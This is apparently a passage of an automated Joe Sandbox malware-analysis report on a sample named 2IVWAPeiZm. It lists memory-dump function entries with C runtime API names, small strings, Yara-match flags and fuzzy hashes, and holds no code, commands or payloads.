                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$Leave$EnterEvent
                          • String ID:
                          • API String ID: 3394196147-0
                          • Opcode ID: a2ac5f14c1fdbe427516915e7673df18383f0521a432ce3d7036e12227a3bb22
                          • Instruction ID: 83a4c5854701827010ca6dd7a58362c9b8c923de3aa7ac550c7e6093f0022ba1
                          • Opcode Fuzzy Hash: a2ac5f14c1fdbe427516915e7673df18383f0521a432ce3d7036e12227a3bb22
                          • Instruction Fuzzy Hash: 6A212632254BC193E648CF26E58079DB3B6F758B90F548029DBAA43724DF38E9A2C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit$_getptd_lockfree
                          • String ID:
                          • API String ID: 2148533958-0
                          • Opcode ID: f2587bb608eee58bbdc4fe3f4ae55a0b20caa350a6235c7f92d91497b64470b6
                          • Instruction ID: 7a147897e926bf7072bf79d4104ef0a9e7542494104610769ccef5e1ca3a4d33
                          • Opcode Fuzzy Hash: f2587bb608eee58bbdc4fe3f4ae55a0b20caa350a6235c7f92d91497b64470b6
                          • Instruction Fuzzy Hash: A1115B32649BD286FA989B15E540BE937B3F784B80F48603DEB4D033A5CF28CE568745
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                          • String ID:
                          • API String ID: 594724896-0
                          • Opcode ID: cbcb0af5c4ec0b9e0fc61f5741c797428a59e1d73c215e25a4a34673d0dbcbe6
                          • Instruction ID: f644ec9dc345c014712f8a133288fc36564576af0daa7c59d39d8e8c4097b887
                          • Opcode Fuzzy Hash: cbcb0af5c4ec0b9e0fc61f5741c797428a59e1d73c215e25a4a34673d0dbcbe6
                          • Instruction Fuzzy Hash: 4C11BF3914469282F6108B29E490BEC7773F790B84F52922DDA6A833B5CF35CE03C704
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection$Freefree
                          • String ID:
                          • API String ID: 1250194111-0
                          • Opcode ID: 2c2e5a34796529a4a5be6099f47fd1e2f13f6f8b89c396f5782b1f565a4b4ed1
                          • Instruction ID: a2e17a3e9e252adc0310e89c259102819042668b343f5c97bda5abb1dc0be3d0
                          • Opcode Fuzzy Hash: 2c2e5a34796529a4a5be6099f47fd1e2f13f6f8b89c396f5782b1f565a4b4ed1
                          • Instruction Fuzzy Hash: AD11C131A80AD1CAFB149F26E440BD873B3FB55BA4F58512DE65A026A5CB38CE478700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 4e3e524fe816d8fdedbbcd9c0117ef821ef529bf089941ea9a5db34e2c72991b
                          • Instruction ID: 0fdf380206e3c4ae9c9b35600009f8dc9c903c5c6feb5a4172631a09b42eb3e5
                          • Opcode Fuzzy Hash: 4e3e524fe816d8fdedbbcd9c0117ef821ef529bf089941ea9a5db34e2c72991b
                          • Instruction Fuzzy Hash: F4114C22B18B018AEB00DB70E9542A833A8FB19758F540A31DA2D827A4EF39E1548780
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$CurrentErrorExitLast_freefls
                          • String ID:
                          • API String ID: 217443660-0
                          • Opcode ID: 0c54948b413dcb62bcc1e19796f41cb7d637fc0fc87dfeb4486389253ca151fe
                          • Instruction ID: 02b1bd3b4af03ff4c454697dc2e9ab6d14e62d4247949795c97eb79c9f5692e5
                          • Opcode Fuzzy Hash: 0c54948b413dcb62bcc1e19796f41cb7d637fc0fc87dfeb4486389253ca151fe
                          • Instruction Fuzzy Hash: DE011438281BE386FF04ABB1D449BDC22B7EB29B84F145838894D47396EF25CE128310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Destroyfree$CreateFree
                          • String ID:
                          • API String ID: 3907340440-0
                          • Opcode ID: 6c35344232297ddca062a7ecf9d343549618f0adc94a152abf304eb900da9dbf
                          • Instruction ID: 017bcdcd6461d0af9552a17a04330a7f679d1e5cce37b7087183ce35c8f9405a
                          • Opcode Fuzzy Hash: 6c35344232297ddca062a7ecf9d343549618f0adc94a152abf304eb900da9dbf
                          • Instruction Fuzzy Hash: 6C01FB762517C196FB49DFA2D2D0BA83372FB44B80F149429DF5A03A50CF34D9B18700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd$_lock
                          • String ID:
                          • API String ID: 3670291111-0
                          • Opcode ID: 0719577052dd8dbbe3d2956cec04f6aa2f25f45637293d100d6e43a18118f971
                          • Instruction ID: dc7e2e2e3d8d0baff2d6a7eee2eff0cf27ae6b3db2f6f0da059037679ebc90eb
                          • Opcode Fuzzy Hash: 0719577052dd8dbbe3d2956cec04f6aa2f25f45637293d100d6e43a18118f971
                          • Instruction Fuzzy Hash: ACF03A31A811D289FA58BB62C852FE82673EB54B44F08627DDA09073E2DF14CF47D311
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
                          • Instruction ID: 0ff36384ee235d28da2c39d84739853e0209b86385bbf37f545b262b2e343d82
                          • Opcode Fuzzy Hash: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
                          • Instruction Fuzzy Hash: 9F614F30248A848BFBA49F58C089BAD73FAFF94311F6C417DE459C6291C734DE928782
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd
                          • String ID: csm$csm
                          • API String ID: 4217099735-3733052814
                          • Opcode ID: b4335f6522e7e80a9ea6f02fb5edf038cefa00e5c77d013af3b4ceb8a0a46fd5
                          • Instruction ID: e03839bb654842f6393b23fce2fb77f0f035dc0fa6a9b2e867dbfd3b3ea96ca7
                          • Opcode Fuzzy Hash: b4335f6522e7e80a9ea6f02fb5edf038cefa00e5c77d013af3b4ceb8a0a46fd5
                          • Instruction Fuzzy Hash: D5519F722442C28AFB64AF25D144BED76B3F345B98F148139DA9857BC5CB38CE92CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandlemallocwsprintf
                          • String ID: %s_bin
                          • API String ID: 2399101171-2665034546
                          • Opcode ID: 73f2347fc04c363fb463311cadf306259aa04cbced74c9f40dacb5d9e580c84a
                          • Instruction ID: 735a5a74e96ddf85284ca8dcd32d2045b031f55c30349411f181ea12d1a7cf60
                          • Opcode Fuzzy Hash: 73f2347fc04c363fb463311cadf306259aa04cbced74c9f40dacb5d9e580c84a
                          • Instruction Fuzzy Hash: 55516936680AE681FB549B66E494BE92377E785B98F45813BDE4943381EF38CE46C301
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: 2390259f5c7b96c66dbe66369981e250b2529a0f82c8583acd2dcf66a4ceee86
                          • Instruction ID: bf94e87399ae75d4d9b1023224316f8937d70d6c22b42ded64df34b4fee55962
                          • Opcode Fuzzy Hash: 2390259f5c7b96c66dbe66369981e250b2529a0f82c8583acd2dcf66a4ceee86
                          • Instruction Fuzzy Hash: A53192715505488FEB94DF08C484FD83BB6FB18355F9A1268E80ADB6A1C375DE82CB85
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 33eed6f18bd9708a75986aa2f9e9a3c3770ea949f362b88cbd3767c942d40272
                          • Instruction ID: d469909a9cf8c50b45cedd39f5f193f8978e563285f29ea63d3dac73ebf429c6
                          • Opcode Fuzzy Hash: 33eed6f18bd9708a75986aa2f9e9a3c3770ea949f362b88cbd3767c942d40272
                          • Instruction Fuzzy Hash: 8F21D731298B884FE754DF69C480B9A76F2FB98314F50467EA059C72A1DB34DE418B82
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 73502fd124d6cf00853d581bf882fb075b8bd757f79a276966b90f1791381e53
                          • Instruction ID: bfdc1264ccbb06477ae5c069fde482f2f1225dea3b4729b7d7e26bcb3e77cd38
                          • Opcode Fuzzy Hash: 73502fd124d6cf00853d581bf882fb075b8bd757f79a276966b90f1791381e53
                          • Instruction Fuzzy Hash: BF217131258B8C4FE744EF18C051B99B7E6FF98314F68066EA49AC72D2CB34CA418782
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 516149fce9f22260bbb91646df7e774d68420353d6d93d3e92b7422021e3e651
                          • Instruction ID: ba0b405e3fb2dbf00936f1fc07bd31494d7097f3547d0e1569dd49292775b1af
                          • Opcode Fuzzy Hash: 516149fce9f22260bbb91646df7e774d68420353d6d93d3e92b7422021e3e651
                          • Instruction Fuzzy Hash: 4B11B631258A4C4FE754EF5CD445BA572F2F798325F10476EA019C32A1CB74C985C782
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: adaa6685140d013229b87e0900e6bb870b5ecf36f56bb8fc9029b7052b75248d
                          • Instruction ID: dc18db952156202acc2ad94cd8a4f0f100bd4e08683a89d168b525862dfd0f9e
                          • Opcode Fuzzy Hash: adaa6685140d013229b87e0900e6bb870b5ecf36f56bb8fc9029b7052b75248d
                          • Instruction Fuzzy Hash: BC31F877140644CAEB709F25C4807983BB7F358BADF8A1229EA4D0BB64C771C981C784
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: f088f751c6130e0347a60f9d5db140f9e09b5be0cd7f400276dad2ae3b248d9f
                          • Instruction ID: bbbca7f4ac2dece226419f0cea7b7f70dde8dd85f25202d865aa29dad37c33c4
                          • Opcode Fuzzy Hash: f088f751c6130e0347a60f9d5db140f9e09b5be0cd7f400276dad2ae3b248d9f
                          • Instruction Fuzzy Hash: 5911547225479186F7209B15D440B9DB7B3F788BD4F585329AF9907B99CB38CA42CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 35b0bd16f7e3123afff5f8d7884c9707d222e55ed248ace39548ee5ea977c29c
                          • Instruction ID: d44ea5c82b4b6bd6efd72be1dbecffe1289b2bdb9907913d969a349e4d6b3e5d
                          • Opcode Fuzzy Hash: 35b0bd16f7e3123afff5f8d7884c9707d222e55ed248ace39548ee5ea977c29c
                          • Instruction Fuzzy Hash: 5F11FE3058068C8AFFA49F68C484BE936AAEF14301F6C01BDD80A862A2D725CE41C741
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: b07f0b1de1580df73ef35a1dda026804a211ccf65fffdaf64d0ab0cb9432950b
                          • Instruction ID: 1dcab5c8c5b16f789d96e96d801fb5b1b3c84a891e9b971e0d909626bfd68dec
                          • Opcode Fuzzy Hash: b07f0b1de1580df73ef35a1dda026804a211ccf65fffdaf64d0ab0cb9432950b
                          • Instruction Fuzzy Hash: 1E11A172650A908AFB10DF12D44079DB672F798FE4F984328AF5807B95CF38C645CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 34a6e5094d230271cc48ef9976103e3764de904eb69e73686b2bc1866bfbe032
                          • Instruction ID: b98e4f2e7ef056de001991571cb21386961907c5e15341cd54933178957b7375
                          • Opcode Fuzzy Hash: 34a6e5094d230271cc48ef9976103e3764de904eb69e73686b2bc1866bfbe032
                          • Instruction Fuzzy Hash: 82014C365C12C2C9FF78BF22C840BE833B7E754B19F585139CA090AA46DB60CE82C301
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno$_callnewhmalloc
                          • String ID:
                          • API String ID: 2761444284-0
                          • Opcode ID: 485d6661091449d068bae3cf5bd4a678363bbd619fbe34a4675e6c934643b4fd
                          • Instruction ID: 3f183925713036d4017950a02a72b77a40c10fc475028de85a3877fe7151107b
                          • Opcode Fuzzy Hash: 485d6661091449d068bae3cf5bd4a678363bbd619fbe34a4675e6c934643b4fd
                          • Instruction Fuzzy Hash: C841A375598B8A4FF764EF6DC581BA676E2FB59300F00453ED98AC3252DBA0DE034781